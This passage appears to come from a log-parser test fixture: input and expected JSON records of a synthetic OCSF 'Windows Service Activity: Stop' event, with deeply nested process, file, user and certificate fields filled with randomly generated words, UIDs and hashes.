\"Sherry@machinery.store\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 25}, \"company_name\": \"Lashell Vincent\", \"mime_type\": \"representing/lee\", \"parent_folder\": \"percent obtaining influenced/liked.bmp\", \"hashes\": [{\"value\": \"E2F3E36EA43BA45AB3503CED0A944CD1A950065C\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"37DB034AE21206C4451CA1E72F6D031F77B7D0A27FF50009CFBECB868E7DE5C6\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"october surrey en\"}, \"uid\": \"290c11c6-a0cf-11ef-90cb-0242ac110007\", \"cmd_line\": \"wires wheels mf\", \"created_time\": 1731399707910, \"parent_process\": {\"name\": \"Petite\", \"pid\": 26, \"file\": {\"name\": \"difficulty.deskthemepack\", \"owner\": {\"name\": \"Costa\", \"type\": \"Unknown\", \"uid\": \"290c33c2-a0cf-11ef-87c6-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"manager\": {\"name\": \"Genetics\", \"type\": \"User\", \"domain\": \"gotta shades electron\", \"type_id\": 1, \"account\": {\"name\": \"hood consortium conversion\", \"type\": \"Windows Account\", \"uid\": \"290c4970-a0cf-11ef-8a6a-0242ac110007\", \"labels\": [\"dose\"], \"type_id\": 2}, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"created_time\": 1731399707912, \"job_title\": \"bestsellers exactly diffs\", \"leave_time\": 1731399707912, \"surname\": \"responded pasta killed\"}}, \"type\": \"Symbolic Link\", \"path\": \"dimensions achieving ordinary/painting.sys/difficulty.deskthemepack\", \"product\": {\"name\": \"implications pizza christmas\", \"version\": \"1.3.0\", \"uid\": \"290c597e-a0cf-11ef-b883-0242ac110007\", \"vendor_name\": \"amateur faith fell\"}, \"uid\": \"290c6086-a0cf-11ef-90f6-0242ac110007\", \"ext\": \"transexuales sas operate\", \"type_id\": 7, \"accessor\": {\"name\": \"Giants\", \"type\": \"System\", \"domain\": \"pressure girl facility\", \"uid\": \"290c722e-a0cf-11ef-b5e2-0242ac110007\", \"type_id\": 3, \"full_name\": \"Marcene Goldie\", \"risk_score\": 35}, \"parent_folder\": \"dimensions achieving ordinary/painting.sys\", \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"created_time\": 1731399707913, \"hashes\": [{\"value\": \"B7B6604452EAF6AB6947459B4FA35CDFDCA39605BF415F77DDD90B47B7AE74ACC2BD0AB274FFC18792A7B43A7EE661EA8098EA69E1D0483392690A4D0BFFA60D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"type\": \"eau\", \"domain\": \"meaning feedback jan\", \"uid\": \"290c8624-a0cf-11ef-97f7-0242ac110007\", \"type_id\": 99, \"credential_uid\": \"290c8e30-a0cf-11ef-9434-0242ac110007\"}, \"created_time\": 1731399707913, \"parent_process\": {\"name\": \"Yards\", \"pid\": 15, \"file\": {\"name\": \"williams.xhtml\", \"type\": \"Folder\", \"path\": \"thailand diameter love/rachel.java/williams.xhtml\", \"signature\": {\"state\": \"diffs seasons conflicts\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"ethernet suitable brandon\", \"issuer\": \"optimization earliest differently\", \"fingerprints\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"DEE5E5BE829C1FF9E773E27CDA4A8960CAB5C8A6F392DA6ACCBACB430B13B9BC64822221325357EAA87B60D5F4474090332CD89561EBEC061294834301DF9AE9\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731399707914, \"expiration_time\": 1731399707914, \"serial_number\": \"photographer tax up\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2}, \"uid\": \"290cc5f8-a0cf-11ef-92a0-0242ac110007\", \"ext\": \"alien cafe barriers\", \"type_id\": 2, \"parent_folder\": \"thailand diameter love/rachel.java\", \"confidentiality\": \"Private\", \"confidentiality_id\": 5, \"hashes\": [{\"value\": \"2B831F21DC87C2B301C73A0ACE1A47E607F1C5210E766355BD25B4E47948BBB20B677EE6C92C70765B352A0CCC29C89AB8D8D3489DEE0CCD7EDE26C6BDF6508F\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"se diabetes vitamin\"}, \"user\": {\"name\": \"Caps\", \"type\": \"System\", \"uid\": \"290cd5ca-a0cf-11ef-80bf-0242ac110007\", \"type_id\": 3, \"full_name\": \"Eve Roger\", \"account\": {\"name\": \"clearing deviant confidential\", \"type\": \"Apple Account\", \"uid\": \"290ce038-a0cf-11ef-8ee9-0242ac110007\", \"type_id\": 8}, \"email_addr\": \"Renda@antivirus.int\", \"uid_alt\": \"forced jvc archives\"}, \"uid\": \"290ce786-a0cf-11ef-9fc4-0242ac110007\", \"cmd_line\": \"reuters revolution thermal\", \"created_time\": 1731399707916, \"lineage\": [\"settled household february\", \"countries implemented chinese\"], \"parent_process\": {\"name\": \"Unions\", \"pid\": 41, \"file\": {\"name\": \"groups.part\", \"size\": 2002602281, \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"alice gnome diploma/consent.tex/groups.part\", \"product\": {\"name\": \"useful yen synopsis\", \"version\": \"1.3.0\", \"uid\": \"290d29f8-a0cf-11ef-a1a1-0242ac110007\", \"feature\": {\"name\": \"spider victor principle\", \"version\": \"1.3.0\", \"uid\": \"290d3420-a0cf-11ef-bd6a-0242ac110007\"}, \"url_string\": \"disagree\", \"vendor_name\": \"ist covered rock\"}, \"uid\": \"290d3b32-a0cf-11ef-bdef-0242ac110007\", \"ext\": \"glory regards somewhere\", \"type_id\": 3, \"company_name\": \"Melida Rosina\", \"parent_folder\": \"alice gnome diploma/consent.tex\", \"accessed_time\": 1731399707918, \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"hashes\": [{\"value\": \"A07C6F758C9EF024F836E2C0BD10FE9C43126081A22D73DD8040D8D179B10DEBE3BC9356500F5C7F0BA87256EFA37A673C190A0AC6F0BFC0529F9FC303878B00\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"isa action je\"}, \"user\": {\"name\": \"Messaging\", \"type\": \"System\", \"uid\": \"290d4c1c-a0cf-11ef-8059-0242ac110007\", \"type_id\": 3, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290d52b6-a0cf-11ef-9425-0242ac110007\", \"cmd_line\": \"rent seed gentleman\", \"created_time\": 1731399707918, \"lineage\": [\"pockets sponsor exactly\", \"disability syntax print\"], \"parent_process\": {\"name\": \"Corrections\", \"pid\": 10, \"file\": {\"name\": \"groove.xlsx\", \"owner\": {\"name\": \"February\", \"type\": \"User\", \"uid\": \"290d70de-a0cf-11ef-86d6-0242ac110007\", \"type_id\": 1, \"credential_uid\": \"290d775a-a0cf-11ef-afe6-0242ac110007\", \"email_addr\": \"Helena@songs.net\", \"risk_level\": \"High\", \"risk_level_id\": 3}, \"type\": \"Folder\", \"version\": \"1.3.0\", \"path\": \"announces contamination leisure/bits.kml/groove.xlsx\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290d9a32-a0cf-11ef-b46e-0242ac110007\", \"is_self_signed\": false, \"subject\": \"conferences kingdom charge\", \"issuer\": \"characterization relatively cas\", \"fingerprints\": [{\"value\": \"90F747EBF0E276407987570F6D39812AC53223E174E41CEDDD291A5F7136E3A6BEF9257C3C73FE3B92D5149E8E1C1BE08A61940CEB8AF03510E22E0492752C18\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"63C326C6244EB0474D3008256E1217754BD2B836E98C247D0A19A57BF2AB18C7FF3D6BF574DB7E31FED2EEC3DA9B7CB69EDDD8DC256FEB8D5E822F176D8444A9\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"created_time\": 1731399707920, \"expiration_time\": 1731399707920, \"serial_number\": \"seed stupid slide\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2, \"developer_uid\": \"290da806-a0cf-11ef-a0a5-0242ac110007\"}, \"ext\": \"retired penn graduated\", \"type_id\": 2, \"parent_folder\": \"announces contamination leisure/bits.kml\", \"hashes\": [{\"value\": \"2A7F70F5957828EEA5C62064B4EB2A32561EB5B3003D729F2605228F225A85EF528EF7666F79B2810432D7E39CB959670A2EA9B1EDEB258E107F47E68D114FEC\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707921}, \"user\": {\"name\": \"Diagram\", \"type\": \"System\", \"domain\": \"existing jun treasury\", \"uid\": \"290db904-a0cf-11ef-aa9a-0242ac110007\", \"org\": {\"name\": \"coding maria scenarios\", \"uid\": \"290dc340-a0cf-11ef-9323-0242ac110007\"}, \"type_id\": 3, \"risk_score\": 79}, \"uid\": \"290dca20-a0cf-11ef-b98e-0242ac110007\", \"cmd_line\": \"mechanical estimates again\", \"created_time\": 1731399707921, \"parent_process\": {\"name\": \"Tabs\", \"pid\": 55, \"session\": {\"uid\": \"290deae6-a0cf-11ef-b636-0242ac110007\", \"issuer\": \"rat employer stadium\", \"created_time\": 1731399707922, \"credential_uid\": \"290df4e6-a0cf-11ef-9290-0242ac110007\", \"expiration_time\": 1731399707922, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"name\": \"integral.cpl\", \"owner\": {\"type\": \"sphere\", \"domain\": \"entirely gale inc\", \"type_id\": 99, \"account\": {\"name\": \"suits kim intellectual\", \"type\": \"AWS IAM User\", \"uid\": \"290e0f3a-a0cf-11ef-92a9-0242ac110007\", \"type_id\": 3}, \"risk_level\": \"carpet diamond departure\", \"uid_alt\": \"meta spank counts\"}, \"size\": 3671310304, \"type\": \"Symbolic Link\", \"path\": \"normal holds match/terrible.iso/integral.cpl\", \"modifier\": {\"name\": \"Acids\", \"type\": \"typing\", \"type_id\": 99}, \"uid\": \"290e1bec-a0cf-11ef-a719-0242ac110007\", \"ext\": \"stated smooth principles\", \"type_id\": 7, \"company_name\": \"Jeremiah Sonny\", \"parent_folder\": \"normal holds match/terrible.iso\", \"hashes\": [{\"value\": \"C449C98FCC2EDC7FE87FAF3FEF6C9D3F5499ACDC3BAC774F19D7B447B333103DCFED31CCAC83F9EE9D1E9601282E92EDA75DAEA8140D8C7EB9220338803C8D6E\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}]}, \"user\": {\"name\": \"Reduce\", \"type\": \"Admin\", \"domain\": \"preceding expressions your\", \"uid\": \"290e30c8-a0cf-11ef-8f59-0242ac110007\", \"groups\": [{\"name\": \"struggle photoshop walking\", \"desc\": \"sleep quoted able\", \"uid\": \"290e3b2c-a0cf-11ef-b7cf-0242ac110007\"}, {\"name\": \"ethiopia evaluate lover\", \"desc\": \"partition sound composition\"}], \"type_id\": 2, \"full_name\": \"Marisha Wesley\", \"ldap_person\": {\"cost_center\": \"spank universal techniques\", \"deleted_time\": 1731399707924, \"ldap_cn\": \"sight tale town\", \"leave_time\": 1731399707924, \"modified_time\": 1731399707924}}, \"uid\": \"290e4748-a0cf-11ef-8355-0242ac110007\", \"cmd_line\": \"flower arrest reveal\", \"created_time\": 1731399707925, \"parent_process\": {\"name\": \"Dip\", \"pid\": 99, \"session\": {\"uid\": \"290e5cb0-a0cf-11ef-8142-0242ac110007\", \"uuid\": \"290e63f4-a0cf-11ef-942e-0242ac110007\", \"issuer\": \"spirits up oral\", \"expiration_time\": 1731399707925, \"is_mfa\": false, \"is_remote\": true}, \"file\": {\"name\": \"fantasy.m4v\", \"owner\": {\"name\": \"Worse\", \"type\": \"User\", \"uid\": \"290e7628-a0cf-11ef-8429-0242ac110007\", \"groups\": [{\"name\": \"pierce deutschland scout\", \"type\": \"sacred mongolia edt\", \"uid\": \"290e8712-a0cf-11ef-b60b-0242ac110007\"}], \"type_id\": 1, \"full_name\": \"Tomika Renato\"}, \"type\": \"Regular File\", \"path\": \"approaches malpractice basics/lifetime.dxf/fantasy.m4v\", \"desc\": \"loops charm mpegs\", \"ext\": \"pork picked investigations\", \"type_id\": 1, \"parent_folder\": \"approaches malpractice basics/lifetime.dxf\", \"accessed_time\": 1731399707926, \"confidentiality\": \"subjective\", \"confidentiality_id\": 99, \"hashes\": [{\"value\": \"DB1A6CE0E4C6F3924C7CCA74924F4B0EF8BC0031\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"2B9A99087B9991B5EAD9406E2CAC8DA385815E6C3FA4DA96E1487782280E8E82FDBD3536F85994E271610D72C5A62E6F027E0CD37DA05806289882A1440BD441\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"xattributes\": {}}, \"user\": {\"name\": \"Expects\", \"type\": \"System\", \"domain\": \"blade keith manga\", \"uid\": \"290e9ba8-a0cf-11ef-9a18-0242ac110007\", \"type_id\": 3, \"account\": {\"name\": \"swedish ol flexible\", \"type\": \"GCP Account\", \"uid\": \"290ea6ca-a0cf-11ef-9b3b-0242ac110007\", \"type_id\": 5}, \"risk_level\": \"world feelings championships\"}, \"uid\": \"290eadbe-a0cf-11ef-9668-0242ac110007\", \"cmd_line\": \"iowa gear scheduling\", \"created_time\": 1731399707927, \"integrity\": \"Medium\", \"integrity_id\": 3, \"lineage\": [\"maximize associations reynolds\"], \"parent_process\": {\"name\": \"Themes\", \"pid\": 45, \"file\": {\"name\": \"designers.rpm\", \"type\": \"Named Pipe\", \"path\": \"votes year mice/fort.gpx/designers.rpm\", \"uid\": \"290edaaa-a0cf-11ef-aa5d-0242ac110007\", \"ext\": \"keyboards yet ask\", \"type_id\": 6, \"mime_type\": \"motorola/patrick\", \"parent_folder\": \"votes year mice/fort.gpx\", \"created_time\": 1731399707928, \"hashes\": [{\"value\": \"02FA8D46FB2AC65EE42912604250A146AF74C6B8CFF1ACD09BC5F460FB9850CAD2674F76F982ED052C78D178196ED4C10256E2BC50E191DBB82F625CAD071090\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"BA1DB3B5141AA0FBF3DD4F6839F49B0B88809121634B4BB39272A838924DDEA2E4D1EBDB9E5F8F8AD90243DBD2A7D2D5497D828BD12E5590FB27483AA1287CD3\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707928}, \"user\": {\"name\": \"Ongoing\", \"uid\": \"290ee9a0-a0cf-11ef-ac76-0242ac110007\", \"credential_uid\": \"290ef076-a0cf-11ef-adb8-0242ac110007\"}, \"tid\": 6, \"uid\": \"290ef99a-a0cf-11ef-a3ec-0242ac110007\", \"cmd_line\": \"correction weapon gaming\", \"created_time\": 1731399707929, \"parent_process\": {\"name\": \"Voyeurweb\", \"pid\": 45, \"file\": {\"name\": \"varied.php\", \"type\": \"Named Pipe\", \"path\": \"mba francis sony/tend.xml/varied.php\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": true, \"subject\": \"undo nickname stay\", \"issuer\": \"yugoslavia how precisely\", \"fingerprints\": [{\"value\": \"BD87A5FFC4117A0F11094CA6BA6A838013BE215959B7358980553B0360822DD67CACADAFA42D71AB48C4EA3EED5F2491D079661CEB0A7694FFA439EB7743CC04\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"4194D1706ED1F408D5E02D672777019F4D5385C766A8C6CA8ACBA3167D36A7B9\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"created_time\": 1731399707930, \"expiration_time\": 1731399707930, \"serial_number\": \"extraction cabin lions\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707930}, \"ext\": \"nicholas doing fraud\", \"type_id\": 6, \"mime_type\": \"nextel/himself\", \"parent_folder\": \"mba francis sony/tend.xml\", \"hashes\": [{\"value\": \"21EA6263C16406DFC344CF7CB2A129B97FD2ECF367C828208CBBEDA6599B989F6C2C3DCB1BDF581ABC97201CF64FFBC0D7415F00564F6D80A92C7FFE7037894C\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"7ED6BDBCCADC1CB9DFEA88CA33B6A9346EAE030FF7E9FADD4C23359C0EA7390D\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"islands interventions removable\", \"xattributes\": {}}, \"user\": {\"name\": \"Soldier\", \"type\": \"User\", \"uid\": \"290f2596-a0cf-11ef-8caf-0242ac110007\", \"type_id\": 1, \"account\": {\"name\": \"ford doug cigarette\", \"type\": \"Mac OS Account\", \"uid\": \"290f3090-a0cf-11ef-9ad3-0242ac110007\", \"type_id\": 7}}, \"uid\": \"290f36e4-a0cf-11ef-bdab-0242ac110007\", \"cmd_line\": \"generally alberta anthropology\", \"created_time\": 1731399707931, \"parent_process\": {\"name\": \"Spirits\", \"pid\": 86, \"file\": {\"name\": \"flights.flv\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"str inner working/pose.h/flights.flv\", \"ext\": \"general became bermuda\", \"type_id\": 1, \"parent_folder\": \"str inner working/pose.h\", \"hashes\": [{\"value\": \"DC684E0A948E820C9B32AE34F0E147CCCAEAB3646C95D1FBF6E5EA257B9107251945EB892CD81A3750D89799ADF86C76382C60E73A85B10D110CE39164882C8F\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"CCD823CAF8108F62C012B02D4C233DA76EACF9FDEA959B9DD909ADF1ECC01BD5F184FC7904184E5A6F296850D7102AAF79E8606629B877723DEC951A67E1B193\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707932}, \"uid\": \"290f6ac4-a0cf-11ef-bc5e-0242ac110007\", \"cmd_line\": \"sense terrorism hl\", \"created_time\": 1731399707932, \"parent_process\": {\"name\": \"Moving\", \"pid\": 43, \"file\": {\"attributes\": 25, \"name\": \"comparison.pages\", \"owner\": {\"name\": \"Infringement\", \"type\": \"User\", \"uid\": \"290f864e-a0cf-11ef-9828-0242ac110007\", \"groups\": [{\"name\": \"coordinate registration browse\", \"desc\": \"attorney ya walked\", \"uid\": \"290f974c-a0cf-11ef-a918-0242ac110007\"}], \"type_id\": 1, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 55, \"uid_alt\": \"licenses cir vacancies\"}, \"type\": \"Unknown\", \"path\": \"lows fc focusing/canvas.pptx/comparison.pages\", \"modifier\": {\"type\": \"User\", \"uid\": \"290fa3ea-a0cf-11ef-b1b2-0242ac110007\", \"groups\": [{\"name\": \"bedroom positions win\", \"desc\": \"amazon feof extras\", \"uid\": \"290fae44-a0cf-11ef-9db8-0242ac110007\"}, {\"name\": \"came swingers colon\", \"uid\": \"290fb646-a0cf-11ef-b3ed-0242ac110007\"}], \"type_id\": 1, \"ldap_person\": {\"employee_uid\": \"290fc050-a0cf-11ef-aac9-0242ac110007\", \"job_title\": \"constitutional ricky jonathan\", \"ldap_dn\": \"marketplace ranch counting\"}, \"risk_score\": 0, \"uid_alt\": \"riding indicate wiley\"}, \"ext\": \"specification cialis inherited\", \"type_id\": 0, \"parent_folder\": \"lows fc focusing/canvas.pptx\", \"confidentiality\": \"engineers families bull\", \"hashes\": [{\"value\": \"F081F7B8D4310E67A7572F60B6070A3034D5F1AE1465B3FE4F8DAFCA9213A0E3\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"EAF741D48E0F26CA709BF17829C53A65D420FBD1F01B0F87BDE25230F1FF332E3D2BE89488F8277FA4B22FF53CC04FF382B19F42B7AC34C3EA5A0C0A89B19FCA\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Worn\", \"type\": \"Admin\", \"domain\": \"threatening parks application\", \"uid\": \"290fd5fe-a0cf-11ef-ab0d-0242ac110007\", \"type_id\": 2, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290fde14-a0cf-11ef-9211-0242ac110007\", \"loaded_modules\": [\"/yacht/payday/singer/stretch/hungry.heic\", \"/fa/bumper/represents/studio/shipments.ttf\"], \"cmd_line\": \"shopping appendix deluxe\", \"created_time\": 1731399707935, \"terminated_time\": 1731399707935}, \"xattributes\": {}}, \"xattributes\": {}}, \"terminated_time\": 1731399707935}}, \"terminated_time\": 1731399707935}}}, \"terminated_time\": 1731399707935}, \"sandbox\": \"snowboard lookup done\"}}}}, \"sandbox\": \"broke alternatives excessive\", \"xattributes\": {}}, \"sandbox\": \"mba ambassador shopping\"}}, \"terminated_time\": 1731399707935}}, \"user\": {\"name\": \"Hearing\", \"type\": \"Admin\", \"domain\": \"thinking answered refurbished\", \"uid\": \"290fefee-a0cf-11ef-ba87-0242ac110007\", \"type_id\": 2, \"ldap_person\": {\"email_addrs\": [\"Melodee@automotive.mobi\", \"Lulu@baby.name\"], \"employee_uid\": \"290ffac0-a0cf-11ef-a362-0242ac110007\", \"leave_time\": 1731399707936, \"office_location\": \"podcast cds lloyd\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 22}}, \"severity_id\": 3, \"status_code\": \"present\", \"status_detail\": \"shade accidents alice\", \"status_id\": 2, \"win_service\": {\"name\": \"balance pgp seasonal\", \"version\": \"1.3.0\", \"uid\": \"29101582-a0cf-11ef-a560-0242ac110007\", \"cmd_line\": \"honduras usa fact\", \"service_dependencies\": [\"enhancements occupations cause\", \"sw verification promotion\"], \"service_start_type\": \"Auto\", \"service_start_type_id\": 3, \"service_start_name\": \"golden thumbs crest\"}}" + }, + "expected": { + "message": "{\"message\": \"gear technologies garlic\", \"status\": \"Failure\", \"time\": 1731399707936, \"device\": {\"owner\": {\"name\": \"Paper\", \"type\": \"Unknown\", \"domain\": \"comfort pick casino\", \"uid\": \"29093ba4-a0cf-11ef-a993-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"2909420c-a0cf-11ef-ae57-0242ac110007\"}, \"type\": \"IDS\", \"uid\": \"29092d44-a0cf-11ef-8baa-0242ac110007\", \"type_id\": 13, \"imei\": \"polyester verified charlie\", \"instance_uid\": \"29091d04-a0cf-11ef-8935-0242ac110007\", \"interface_name\": \"fonts roller schema\", \"interface_uid\": \"290925c4-a0cf-11ef-83a0-0242ac110007\", \"is_managed\": true, \"network_interfaces\": [{\"name\": \"nickname museums symptoms\", \"type\": \"Unknown\", \"hostname\": \"influenced.museum\", \"mac\": \"25:15:EA:C3:5F:12:EF:E9\", \"type_id\": 0}, {\"name\": \"polar bm traveler\", \"type\": \"Wired\", \"hostname\": \"vegetarian.store\", \"mac\": \"87:8C:2:BD:DD:A8:43:3A\", \"type_id\": 1}], \"region\": \"provider nirvana absolute\", \"risk_level\": \"Critical\", \"risk_level_id\": 4}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"pokemon know retrieval\", \"version\": \"1.3.0\", \"path\": \"dolls vid representing\", \"uid\": \"290890b4-a0cf-11ef-b8db-0242ac110007\", \"vendor_name\": \"hide broken trademark\"}, \"profiles\": [], \"log_name\": \"cindy drives thin\", \"log_provider\": \"foo canada biodiversity\", \"original_time\": \"virus pure partly\", \"processed_time\": 1731399707888}, \"start_time\": 1731399707936, \"severity\": \"Medium\", \"category_uid\": 1, \"activity_id\": 4, \"type_uid\": 20100404, \"type_name\": \"Windows Service Activity: Stop\", \"observables\": [{\"name\": \"generation damages hawaii\", \"type\": \"Email\", \"value\": \"sale talking pairs\", \"type_id\": 22}, {\"name\": \"testimonials seventh smallest\", \"type\": \"MAC Address\", \"type_id\": 3}], \"category_name\": \"System Activity\", \"class_uid\": 201004, \"class_name\": \"Windows Service Activity\", \"timezone_offset\": 72, \"activity_name\": \"Stop\", \"actor\": {\"process\": {\"name\": \"Don\", \"pid\": 38, \"file\": {\"name\": \"developmental.otf\", \"type\": \"Regular File\", \"path\": \"vg tunisia river/favorite.wsf/developmental.otf\", \"ext\": \"mike biography serial\", \"type_id\": 1, \"accessor\": {\"name\": \"Mathematical\", \"type\": \"Unknown\", \"domain\": \"touring wing sunglasses\", \"org\": {\"name\": \"battery met word\", \"uid\": \"29099612-a0cf-11ef-9f88-0242ac110007\", \"ou_name\": \"invitation olympus putting\"}, \"type_id\": 0, \"credential_uid\": \"29099f68-a0cf-11ef-ab1c-0242ac110007\", \"risk_level\": \"constitution missions steam\"}, \"parent_folder\": \"vg tunisia river/favorite.wsf\", \"confidentiality\": \"Top Secret\", \"confidentiality_id\": 4, \"hashes\": [{\"value\": \"9280AE13A255F18D841739D0D18222BB950C8FC7\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"security_descriptor\": \"gibson columbia refund\"}, \"user\": {\"name\": \"Journal\", \"type\": \"System\", \"domain\": \"tuition gst cheese\", \"uid\": \"2909b99e-a0cf-11ef-946c-0242ac110007\", \"groups\": [{\"name\": \"overview friendly ul\", \"desc\": \"spent richards molecular\", \"privileges\": [\"gale suicide combo\"]}], \"type_id\": 3, \"full_name\": \"Lynsey Sherise\"}, \"uid\": \"2909c8d0-a0cf-11ef-82af-0242ac110007\", \"cmd_line\": \"hdtv il murder\", \"created_time\": 1731399707895, \"parent_process\": {\"name\": \"Indoor\", \"pid\": 29, \"session\": {\"terminal\": \"eternal armor maternity\", \"uid\": \"290a04bc-a0cf-11ef-9799-0242ac110007\", \"uuid\": \"290a0af2-a0cf-11ef-8713-0242ac110007\", \"issuer\": \"troubleshooting footage pour\", \"created_time\": 1731399707897}, \"file\": {\"attributes\": 81, \"name\": \"submitted.cpp\", \"owner\": {\"name\": \"Reverse\", \"type\": \"Unknown\", \"domain\": \"wiki ba evaluating\", \"uid\": \"290a2bea-a0cf-11ef-a2af-0242ac110007\", \"type_id\": 0, \"email_addr\": \"Bessie@outcomes.pro\", \"risk_level\": \"plenty sarah preparation\"}, \"size\": 2618568753, \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"annually chapters country/separately.pdf/submitted.cpp\", \"modifier\": {\"name\": \"Appraisal\", \"type\": \"Admin\", \"uid\": \"290a3a2c-a0cf-11ef-96ea-0242ac110007\", \"type_id\": 2}, \"desc\": \"deeply dresses hills\", \"ext\": \"scholarships fundraising hydrocodone\", \"type_id\": 5, \"company_name\": \"Galen Nakita\", \"parent_folder\": \"annually chapters country/separately.pdf\", \"accessed_time\": 1731399707898, \"hashes\": [{\"value\": \"9E2FB759708B9621D802CC03D5DA0C1600A80AE7A740A0840F232C31B6E61F01EE5CF00A1719E67BEC538182D8A3074DA5123670601506065A44D4E8AC2C4CB2\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"user\": {\"name\": \"Asian\", \"type\": \"Unknown\", \"uid\": \"290a520a-a0cf-11ef-a44f-0242ac110007\", \"type_id\": 0, \"full_name\": \"Roland Nichol\", \"account\": {\"name\": \"girl sugar benefit\", \"type\": \"Azure AD Account\", \"uid\": \"290a5ef8-a0cf-11ef-809f-0242ac110007\", \"labels\": [\"complex\"], \"type_id\": 6}, \"credential_uid\": \"290a66e6-a0cf-11ef-a28e-0242ac110007\", \"uid_alt\": \"transportation vegetables debian\"}, \"uid\": \"290a756e-a0cf-11ef-86a9-0242ac110007\", \"cmd_line\": \"bull retailers sensitivity\", \"created_time\": 1731399707900, \"lineage\": [\"george herein ghz\"], \"parent_process\": {\"name\": \"Broader\", \"pid\": 50, \"file\": {\"name\": \"vegetation.tif\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"leonard accent told/determine.sdf/vegetation.tif\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"traffic changes calm\", \"issuer\": \"give img nsw\", \"fingerprints\": [{\"value\": \"7245C357B5BE2E81CFA6582A9CEF4108E8E9BC9E4DA47D108C495262F1EE943BB741CFFE5FDDEE5B3AD441498918E714FF20108B4CDDEDE100B8AD003E7DDA73\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"created_time\": 1731399707900, \"serial_number\": \"blades mike seal\"}, \"algorithm\": \"Authenticode\", \"algorithm_id\": 4}, \"desc\": \"electronics charges gallery\", \"ext\": \"disorder agriculture anger\", \"type_id\": 1, \"company_name\": \"Billie Shawnee\", \"mime_type\": \"briefly/entirely\", \"parent_folder\": \"leonard accent told/determine.sdf\", \"created_time\": 1731399707900, \"hashes\": [{\"value\": \"0947FCC917EB1D3C89AD818BEB61E3B2C3CF3BBA\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"CEE604715F44D7CD732D46B9B349EC7911E55D19C6E598E8064B403337EB8F9EA9E58A34D42BA046D72E529215E7D8E2AB68DA5552324343DA54BF3220615F0A\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"modified_time\": 1731399707900}, \"user\": {\"name\": \"Markers\", \"type\": \"Unknown\", \"uid\": \"290a9f62-a0cf-11ef-b0c9-0242ac110007\", \"groups\": [{\"name\": \"foul administrative owns\", \"uid\": \"290aaa98-a0cf-11ef-a3a1-0242ac110007\"}, {\"name\": \"develop houston gamma\", \"uid\": \"290ab498-a0cf-11ef-80bd-0242ac110007\", \"privileges\": [\"shade bell link\", \"processor code ashley\"]}], \"type_id\": 0, \"account\": {\"type\": \"AWS Account\", \"uid\": \"290abf42-a0cf-11ef-a831-0242ac110007\", \"type_id\": 10}}, \"uid\": \"290ac5dc-a0cf-11ef-a78c-0242ac110007\", \"cmd_line\": \"studies un checking\", \"created_time\": 1731399707902, \"integrity\": \"Unknown\", \"integrity_id\": 0, \"lineage\": [\"commodity config charges\", \"wikipedia las relatives\"], \"parent_process\": {\"name\": \"Eyed\", \"pid\": 59, \"user\": {\"name\": 